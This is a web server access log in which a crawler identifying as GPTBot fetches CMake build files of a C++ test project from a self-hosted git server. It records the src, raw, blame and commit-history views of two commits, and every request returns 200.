"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:21:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 9962] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:15:21:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 8040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:15:21:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 8040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:15:21:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16405] [Gzip 12.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:15:21:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16403] [Gzip 12.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:15:21:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 9948] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:15:21:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 9962] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:15:21:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9952] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:15:21:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9953] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:15:21:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 11516] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:15:21:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 9961] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:15:21:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 11517] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:15:21:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:15:21:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 777] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:15:21:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 777] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:15:21:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 9969] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:15:21:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 9968] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:15:21:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10176] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:15:21:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 39743] [Gzip 13.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:15:22:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 39745] [Gzip 13.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:15:22:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 53866] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:15:22:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 234] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:15:22:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11194] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:22:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 53866] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:15:22:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14296] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:22:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14296] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:22:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11100] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:22:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 14639] [Gzip 5.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:22:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11099] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:22:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 14639] [Gzip 5.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:22:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 9944] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:22:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 9944] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:22:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 9938] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:22:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 9949] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:15:22:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10175] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:15:22:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 234] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:15:22:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14306] [Gzip 8.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:15:22:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 4092] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:15:22:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=source" [Client 74.7.227.38] [Length 14655] [Gzip 5.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:15:22:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 8088] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:15:22:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:15:22:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10024] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:15:22:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:15:22:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10022] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:15:22:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 9943] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:15:22:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 9942] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:15:22:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:15:22:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 4092] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 